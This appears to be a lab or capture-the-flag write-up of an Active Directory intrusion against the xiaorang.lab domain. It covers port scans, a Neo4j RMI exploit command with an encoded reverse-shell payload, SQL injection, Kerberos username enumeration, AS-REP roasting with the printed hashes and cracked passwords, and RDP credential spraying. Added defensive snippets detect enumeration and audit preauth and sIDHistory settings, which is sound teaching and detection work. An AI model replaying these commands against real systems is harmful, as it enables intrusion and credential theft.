External network reconnaissance
No web assets showed up at this point, so a full port scan was run:
```
D:\桌面\信息收集\fscan2>fscan.exe -h 39.99.136.105 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 1-65535
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 65535 个有效端口
[+] 端口开放 39.99.136.105:22
[+] 端口开放 39.99.136.105:1337
[+] 端口开放 39.99.136.105:43813
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[*] 已完成 0/3
[-] webtitle https://39.99.136.105:1337 Get "https://39.99.136.105:1337": EOF
[!] 扫描错误 39.99.136.105:1337 - Get "https://39.99.136.105:1337": EOF
[!] 扫描错误 39.99.136.105:43813 - Get "https://39.99.136.105:43813": EOF
[!] 扫描错误 39.99.136.105:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 3/3
[*] 扫描结束,耗时: 4m53.3039141s
```
Neo4j database
CVE-2021-34371
```
java -jar rhino_gadget.jar rmi://39.99.136.105:1337 "bash -c {echo,xxx}|{base64,-d}|{bash,-i}"
```
Internal network penetration
Internal network information gathering
```
neo4j@ubuntu:/tmp$ ./fscan -h 172.22.6.1/24

┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-03-08 14:05:28] [INFO] 暴力破解线程数: 1
[2025-03-08 14:05:28] [INFO] 开始信息扫描
[2025-03-08 14:05:28] [INFO] CIDR范围: 172.22.6.0-172.22.6.255
[2025-03-08 14:05:28] [INFO] 生成IP范围: 172.22.6.0.%!d(string=172.22.6.255) - %!s(MISSING).%!d(MISSING)
[2025-03-08 14:05:29] [INFO] 解析CIDR 172.22.6.1/24 -> IP范围 172.22.6.0-172.22.6.255
[2025-03-08 14:05:29] [INFO] 最终有效主机数量: 256
[2025-03-08 14:05:29] [INFO] 开始主机扫描
[2025-03-08 14:05:29] [INFO] 正在尝试无监听ICMP探测...
[2025-03-08 14:05:29] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-03-08 14:05:29] [INFO] 切换为PING方式探测...
[2025-03-08 14:05:29] [SUCCESS] 目标 172.22.6.12 存活 (ICMP)
[2025-03-08 14:05:29] [SUCCESS] 目标 172.22.6.25 存活 (ICMP)
[2025-03-08 14:05:29] [SUCCESS] 目标 172.22.6.38 存活 (ICMP)
[2025-03-08 14:05:29] [SUCCESS] 目标 172.22.6.36 存活 (ICMP)
[2025-03-08 14:05:35] [INFO] 存活主机数量: 4
[2025-03-08 14:05:35] [INFO] 有效端口数量: 233
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:88
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.36:22
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:135
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.25:139
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:139
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.25:135
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:389
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.38:22
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.25:445
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.12:445
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.38:80
[2025-03-08 14:05:35] [SUCCESS] 端口开放 172.22.6.36:7687
[2025-03-08 14:05:35] [SUCCESS] 服务识别 172.22.6.36:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-08 14:05:35] [SUCCESS] 服务识别 172.22.6.38:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.12:88 =>
[2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.25:139 => Banner:[.]
[2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.12:139 => Banner:[.]
[2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.12:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.25:445 =>
[2025-03-08 14:05:40] [SUCCESS] 服务识别 172.22.6.12:445 =>
[2025-03-08 14:05:41] [SUCCESS] 服务识别 172.22.6.38:80 => [http]
[2025-03-08 14:05:46] [SUCCESS] 服务识别 172.22.6.36:7687 =>
[2025-03-08 14:06:40] [SUCCESS] 服务识别 172.22.6.12:135 =>
[2025-03-08 14:06:40] [SUCCESS] 服务识别 172.22.6.25:135 =>
[2025-03-08 14:06:40] [INFO] 存活端口数量: 12
[2025-03-08 14:06:40] [INFO] 开始漏洞扫描
[2025-03-08 14:06:40] [INFO] 加载的插件: findnet, ldap, ms17010, neo4j, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-08 14:06:40] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.6.25
主机名: WIN2019
发现的网络接口:
   IPv4地址:
      └─ 172.22.6.25
[2025-03-08 14:06:40] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.6.12
主机名: DC-PROGAME
发现的网络接口:
   IPv4地址:
      └─ 172.22.6.12
[2025-03-08 14:06:40] [SUCCESS] 网站标题 http://172.22.6.38 状态码:200 长度:1531 标题:后台登录
[2025-03-08 14:06:40] [SUCCESS] NetBios 172.22.6.25 XIAORANG\WIN2019
[2025-03-08 14:06:40] [SUCCESS] NetBios 172.22.6.12 DC:DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-03-08 14:06:40] [INFO] 系统信息 172.22.6.12 [Windows Server 2016 Datacenter 14393]
[2025-03-08 14:06:41] [SUCCESS] 网站标题 https://172.22.6.36:7687 状态码:400 长度:50 标题:无标题
[2025-03-08 14:07:04] [SUCCESS] 扫描已完成: 22/22
```
Backend login
The backend login page is vulnerable to SQL injection.
```
Database: oa_db
Table: oa_users
[500 entries]
+-----+----------------------------+-------------+-----------------+
| id  | email                      | phone       | username        |
+-----+----------------------------+-------------+-----------------+
[14:17:26] [WARNING] console output will be trimmed to last 256 rows due to large table size
+-----+----------------------------+-------------+-----------------+
```
Kerberos AS-REQ domain username enumeration attack
Seeing that every e-mail address ends in @xiaorang.lab makes it natural to try enumerating domain users.
During the AS-REQ stage of Kerberos authentication, when the user named in the cname field does not exist, the response reports KDC_ERR_C_PRINCIPAL_UNKNOWN. When the user does exist, the responses for a correct and an incorrect password differ from that as well. So even without domain credentials, this difference lets us enumerate domain users.
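The difference described above is visible on the KDC side too: each AS-REQ for a non-existent principal is audited as Security event 4768 with result code 0x6. The following added example (not code from the original write-up) shows detection logic that flags the burst pattern an enumeration run produces, run over constructed 4768 records; the one-line field layout, the names and the client addresses are assumptions.

```python
"""Detect Kerberos username enumeration in Windows Security event 4768.

Added example for this write-up, not part of the original post. The
4768 records below are constructed in a simplified one-line-per-event
form (not real DC logs). The signal: one client address producing many
4768 failures with ResultCode 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for
many *distinct* names within a short window. kerbrute tested 124 names
in 0.014 s in the write-up, so a real run looks like a burst.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6

# Constructed sample. 172.22.6.36 plays the enumerating host; the two
# 0x0 lines and the single typo ("zhangxn") from 172.22.6.25 are the
# kind of benign noise that must not trip the rule.
SAMPLE_4768 = """\
2025-03-08T14:33:26Z 4768 TargetUserName=wenshao ResultCode=0x0 IpAddress=172.22.6.25
2025-03-08T14:33:27Z 4768 TargetUserName=aaron ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=abby ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=adam ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=admin2 ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=alice ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=bob ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=carol ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=dave ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=erin ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=frank ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=grace ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:27Z 4768 TargetUserName=heidi ResultCode=0x6 IpAddress=172.22.6.36
2025-03-08T14:33:40Z 4768 TargetUserName=zhangxn ResultCode=0x6 IpAddress=172.22.6.25
2025-03-08T14:35:02Z 4768 TargetUserName=zhangxin ResultCode=0x0 IpAddress=172.22.6.25
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) 4768 TargetUserName=(?P<user>\S+) "
    r"ResultCode=(?P<code>0x[0-9a-fA-F]+) IpAddress=(?P<ip>\S+)$"
)


def parse_4768(text):
    """Parse the simplified one-line 4768 format into dicts; skip junk."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "user": m["user"].lower(),
            "code": int(m["code"], 16),
            "ip": m["ip"],
        })
    return events


def find_enumeration(events, window=timedelta(seconds=60), min_names=10):
    """Return {client_ip: sorted distinct unknown names} for each client
    that asked for >= min_names distinct non-existent principals inside
    any sliding window of length `window`. A single 0x6 from a user who
    mistyped their own name never reaches the threshold."""
    by_ip = defaultdict(list)
    for e in events:
        if e["code"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_ip[e["ip"]].append(e)

    hits = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it spans <= `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            names = {e["user"] for e in evs[start:end + 1]}
            if len(names) >= min_names:
                hits[ip] = sorted({e["user"] for e in evs})
                break
    return hits


if __name__ == "__main__":
    for ip, names in find_enumeration(parse_4768(SAMPLE_4768)).items():
        print(f"enumeration from {ip}: {len(names)} unknown names, e.g. {names[:3]}")
```

The rule keys on distinct names rather than raw event count so that a single misconfigured service account retrying one wrong principal does not page anyone.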
```
neo4j@ubuntu:/tmp$ ./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab 1.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/08/25 - Ronnie Flathers @ropnop

2025/03/08 14:33:27 >  Using KDC(s):
2025/03/08 14:33:27 >  	172.22.6.12:88

2025/03/08 14:33:27 >  [+] VALID USERNAME:	 chengqiu@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 louyou@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 weishengshan@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 maqun@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 wenbiao@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 wenliang@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 chuyuan@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 pangzhen@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 yulvxue@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 luyue@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 lezhong@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 guohong@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 ganjian@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 sheweiyue@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 dujian@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 yexing@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 hongqun@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 lidongjin@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 qiaomei@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 maoda@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 zhangxin@xiaorang.lab
2025/03/08 14:33:27 >  [+] VALID USERNAME:	 wenshao@xiaorang.lab
2025/03/08 14:33:27 >  Done! Tested 124 usernames (22 valid) in 0.014 seconds
```
AS-REP Roasting attack
AS-REP Roasting is an attack that recovers a user account's password by offline brute force. Its applicability is limited, though: the target account must have the "Do not require Kerberos preauthentication" option enabled.
For a domain user with "Do not require Kerberos preauthentication" set, an AS-REQ sent to port 88 of the domain controller returns an AS-REP whose contents can be reassembled into the "Kerberos 5 AS-REP etype 23" format (hashcat mode 18200). That string can then be cracked with hashcat or john to obtain the user's plaintext password. This option is not set by default.
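Whether an account is exposed comes down to one bit of userAccountControl, so the exposure can be audited from a directory export before anyone asks the KDC. Added example, not from the write-up or from impacket/Adinfo; the account records are constructed to mirror what Adinfo reported for this domain, and the Set-ADAccountControl remediation in the comment is a standard RSAT cmdlet, not something the page ran.

```python
"""Audit which accounts are exposed to AS-REP roasting.

Added example for this write-up, not part of the original post and not
impacket/Adinfo code. The account records are constructed to resemble
what the write-up's Adinfo run reported (2 AS-REP-roastable users,
some disabled accounts, non-expiring passwords); not real LDAP output.

Pre-authentication is controlled by the DONT_REQ_PREAUTH bit
(0x400000) of userAccountControl. This is exactly the property
GetNPUsers.py tests ("doesn't have UF_DONT_REQUIRE_PREAUTH set"), so
decoding that attribute from your own directory export tells you which
accounts would hand out a crackable AS-REP to anyone, no credentials
required.
"""

UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

# Constructed records: (sAMAccountName, userAccountControl, adminCount).
SAMPLE_ACCOUNTS = [
    ("Administrator", 0x10200, 1),
    ("krbtgt", 0x202, 1),
    ("wenshao", 0x410200, 0),   # preauth off + password never expires
    ("zhangxin", 0x400200, 0),  # preauth off
    ("olduser", 0x400202, 0),   # preauth off but account disabled
    ("chengqiu", 0x200, 0),
]


def decode_uac(value):
    """Names of the flags set in a userAccountControl value (subset)."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(accounts):
    """Enabled accounts with pre-authentication disabled, worst first.

    A disabled account still carries the bit, but the KDC will not issue
    an AS-REP for it, so those are reported by stale_preauth_flags()."""
    findings = []
    for name, uac, admin_count in accounts:
        flags = decode_uac(uac)
        if "DONT_REQ_PREAUTH" not in flags or "ACCOUNTDISABLE" in flags:
            continue
        severity = "high" if admin_count == 1 else "medium"
        if "DONT_EXPIRE_PASSWORD" in flags:
            severity = "high"   # a cracked password stays valid forever
        findings.append({"account": name, "severity": severity, "flags": flags})
    order = {"high": 0, "medium": 1}
    findings.sort(key=lambda f: (order[f["severity"]], f["account"]))
    return findings


def stale_preauth_flags(accounts):
    """Disabled accounts that still carry DONT_REQ_PREAUTH: not roastable
    today, but one re-enable away from it. Clear the bit anyway."""
    return [n for n, uac, _ in accounts
            if uac & 0x400000 and uac & 0x0002]


# Remediation (PowerShell with the ActiveDirectory module):
#   Set-ADAccountControl -Identity wenshao -DoesNotRequirePreAuth $false
# and rotate the password of every account that had the bit set, since
# an AS-REP captured while it was on can still be cracked offline.

if __name__ == "__main__":
    for f in asrep_roastable(SAMPLE_ACCOUNTS):
        print(f"[{f['severity']}] {f['account']}: {', '.join(f['flags'])}")
    print("stale:", stale_preauth_flags(SAMPLE_ACCOUNTS))
```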
```
┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetNPUsers.py -dc-ip 172.22.6.12 xiaorang.lab/ -usersfile '/home/hey/Desktop/user.txt'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0', 'GetNPUsers.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User chengqiu@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User louyou@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User weishengshan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User maqun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User wenbiao@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User wenliang@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User chuyuan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User pangzhen@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User yulvxue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User luyue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User lezhong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User guohong@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User ganjian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User sheweiyue@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User dujian@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User yexing@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User hongqun@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User lidongjin@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User qiaomei@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
[-] User maoda@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:65169ecc66c7d1d07e74fd0bf9aa8c1b$09166b49cc65f6c20ee6e0aeb6bda3aeb423b72088198856b99830e958a869c0ea29afb36063a39b8b2d223e4f2c360af0a8ab751dbcb6e55f889597d20446b93c68ab56dba6c09b4c22564eded27e484a2c3c765d699079a85f140091b80dc4531f9b183b2ef30530627d7ded0c29c543cf8e31b7458128a97ca6c63772d6c9d677aa6ff9c6a2f017fc268c0c5eb5e99423e2a2b6184fa6e6fdefe5d2636a4d44cc47b4cb49655c5c10364f5f207cfaf494ea0e8e054a8ffe55548f072a0d2a51f99fe10853a7ce4611aa71c3206bab18dd60527f3d06c7ee01aee0ad3812b7a22ef7c5e0ad1beb2f2fbe22
[proxychains] Strict chain  ...  47.122.38.153:6666  ...  172.22.6.12:88  ...  OK
$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:388eb817d56659e56a35087ea775ca5b$a75390df6135eac3463ac96895a1e24b467459486922a02fa91edc437b5434808911000ddf919cbd80f27fd0113742be2d0d517cb03832acd4f700578ba7706419768bbc012726d935990835e73a2495f19e22ca1166a98992bb3837917bc7979adfa3477002696197cb92c7ff71d7413afaa8562838ccf0cc962f74f9cf63fe18c64ca2bc6cf55617737ca57264c85b721e891a1963e8c61eb8b7f3ddc284710415cedb1a2b8a9040f386343076f526f4d13eced75126af76952830315b5b81a1bd700f35557ed40cc64eba1572bcd8127255d9e92478b5314cbc6fd19cdd58258024b307b953310f29dcd2
```
Hash cracking
```
wenshao:hellokitty
zhangxin:strawberry
```
RDP brute force
```
$ proxychains crackmapexec rdp 172.22.6.0/24 -u wenshao -p hellokitty -d xiaorang.lab
RDP         172.22.6.25     3389   WIN2019          [*] Windows 10 or Windows Server 2016 Build 17763 (name:WIN2019) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.12     3389   DC-PROGAME       [*] Windows 10 or Windows Server 2016 Build 14393 (name:DC-PROGAME) (domain:xiaorang.lab) (nla:True)
RDP         172.22.6.25     3389   WIN2019          [+] xiaorang.lab\wenshao:hellokitty (Pwn3d!)
RDP         172.22.6.12     3389   DC-PROGAME       [+] xiaorang.lab\wenshao:hellokitty

mstsc /admin /v: 172.22.6.25:3389
```
Domain penetration
Domain information gathering
Adinfo
```
neo4j@ubuntu:/tmp$ ./Adinfo_linux -d xiaorang.lab --dc 172.22.6.12 -u zhangxin -p strawberry

    _____  _____  _        __
   /\    |  __ \(_)      / _|
  /  \   | |  | |_ _ __ | |_ ___
 / /\ \  | |  | | | '_ \|  _/ _ \     Tools that collect information from domain
/ ____ \ | |__| | | | | | || (_) |
/_/    \_\_____/|_|_| |_|_| \___/     v1.5 by lzz

[i] Try to connect '172.22.6.12'
[c] Auth Domain: xiaorang.lab
[c] Auth user: zhangxin@xiaorang.lab
[c] Auth Pass: strawberry
[c] connected successfully,try to dump domain info
[i] DomainVersion found!
 [+] Windows 2016 Server operating system
[i] Domain SID:
 [+] S-1-5-21-3623938633-4064111800-2925858365
[i] Domain MAQ found
 [+] 0
[i] Domain Account Policy found
 [+] pwdHistory: 0
 [+] minPwdLength: 0
 [+] minPwdAge: 0(day)
 [+] maxPwdAge: 10675199(day)
 [+] lockoutThreshold: 0
 [+] lockoutDuration: 30(min)
[i] Domain Controllers: 1 found
 [+] DC-PROGAME$ ==>>> Windows Server 2016 Datacenter [10.0 (14393)] ==>>> 172.22.6.12
[i] ADCS has not found!
[i] Domain Exchange Server: 0 found
[i] Domain All DNS:
 [+] Domain Dns 2 found,Saved in All_DNS.csv
[i] Domain Trusts: 0 found
[i] SPN: 31 found
[i] Domain GPOs: 2 found
[i] Domain Admins: 1 users found
 [+]Administrator
[i] Enterprise Admins: 1 users found
 [+]Administrator
[i] administrators: 1 users found
 [+]Administrator
[i] Backup Operators: 0 users found
[i] Users: 77 found
[i] User with Mail: 0 found
[i] Only_name_and_Useful_Users: 74 found
[i] Only_admincount=1_andUseful_Users: 1 found
[i] Locked Users: 0 found
[i] Disabled Users: 3 found
[i] Users with passwords not set to expire: 5 found
[i] Domain Computers: 2 found
[i] Only_name_and_Useful_computers: 2 found
[i] Groups: 49 found
[i] Domain OUs: 1 found
[i] LAPS Not found
[i] LAPS passwords: 0 found
[i] SensitiveDelegate Users: 0 found
[i] AsReproast Users: 2 found
 [+] wenshao
 [+] zhangxin
[i] Kerberoast Users: 1 found
 [+] CN=krbtgt,CN=Users,DC=xiaorang,DC=lab ==>>> kadmin/changepw
[i] SIDHistory Users: 1 found
 [+] yuxuan ==>>> Administrator
[i] CreatorSID Users: 0 found
[i] RBCD Users: 0 found
[i] Unconstrained Deligation Users: 0 found
[i] Constrained Deligation Users: 0 found
[i] Krbtgt password last set time: 2022-06-29 09:03:34 +0800 CST
[i] CSVs written to 'csv' directory in /tmp
[i] Execution took 686.596318ms
```
The SID History of the user yuxuan maps to Administrator. Inside a domain every user has its own SID; its main purpose is to identify the security principal and govern the access rights a user gets when connecting to resources. SID History is an attribute used during domain migration. If a domain user is migrated from domain A to domain B, the user's SID changes in domain B, so after migration the user can no longer access the resources of domain A. SID History preserves the user's access to domain A after migration: the original SID is added to the migrated user's SID History attribute, so the migrated user keeps the original permissions and can still reach the resources it could reach before.
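Because the page's finding is a same-domain, RID-500 SID sitting in sIDHistory, that is exactly the condition a defender should audit for. Added example (not from the write-up or from Adinfo) that walks a set of constructed user records against the domain SID Adinfo reported and flags history entries pointing at the current domain or at a privileged RID; the OLD_DOMAIN SID and the non-yuxuan records are assumptions.

```python
"""Find accounts whose sIDHistory grants them another principal's rights.

Added example for this write-up, not part of the original post or of
Adinfo. The records are constructed; the domain SID is the one Adinfo
printed for xiaorang.lab in the write-up.

Two things make an sIDHistory entry suspicious rather than a migration
leftover: (1) it belongs to the *current* domain (a migrated user's old
SID should come from the source domain), and (2) its RID is a
privileged one such as 500 (Administrator) or 512 (Domain Admins).
The write-up's `yuxuan ==>>> Administrator` finding is (1) and (2) at
once. On the event side, Security event 4765 ("SID History was added
to an account") is the moment to catch this being set.
"""
import re

DOMAIN_SID = "S-1-5-21-3623938633-4064111800-2925858365"  # from Adinfo output

PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")


def split_sid(sid):
    """Return (domain_part, rid) for a domain SID, or raise ValueError."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    rid_text = m.group(1)
    return sid[: -len(rid_text) - 1], int(rid_text)


# Constructed records: (sAMAccountName, objectSid, sIDHistory list).
OLD_DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"  # hypothetical source domain
SAMPLE_USERS = [
    ("yuxuan", f"{DOMAIN_SID}-1180", [f"{DOMAIN_SID}-500"]),     # the page's finding
    ("migrated1", f"{DOMAIN_SID}-1201", [f"{OLD_DOMAIN}-1105"]),  # normal migration
    ("migrated2", f"{DOMAIN_SID}-1202", [f"{OLD_DOMAIN}-512"]),   # foreign Domain Admins
    ("zhangxin", f"{DOMAIN_SID}-1140", []),
]


def audit_sid_history(users, domain_sid):
    """One finding per suspicious sIDHistory entry, in input order."""
    findings = []
    for name, _sid, history in users:
        for hist in history:
            dom, rid = split_sid(hist)
            reasons = []
            if dom == domain_sid:
                reasons.append("same-domain SID in sIDHistory")
            if rid in PRIVILEGED_RIDS:
                reasons.append(f"privileged RID {rid} ({PRIVILEGED_RIDS[rid]})")
            if reasons:
                findings.append({
                    "account": name,
                    "history_sid": hist,
                    "maps_to": PRIVILEGED_RIDS.get(rid),
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in audit_sid_history(SAMPLE_USERS, DOMAIN_SID):
        print(f"{f['account']}: {f['history_sid']} -> {'; '.join(f['reasons'])}")
```

A same-domain entry has no legitimate migration story, so the fix is to clear the attribute and treat the account as an already-used persistence path, not just a misconfiguration.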
BloodHound
Owned
Find Shortest Paths to Domain Admins
The attack path is now clear: to reach the domain controller, start from the user YUXUAN@XIAORANG.
Attack path inside the domain
SIDHistory attack, user: yuxuan
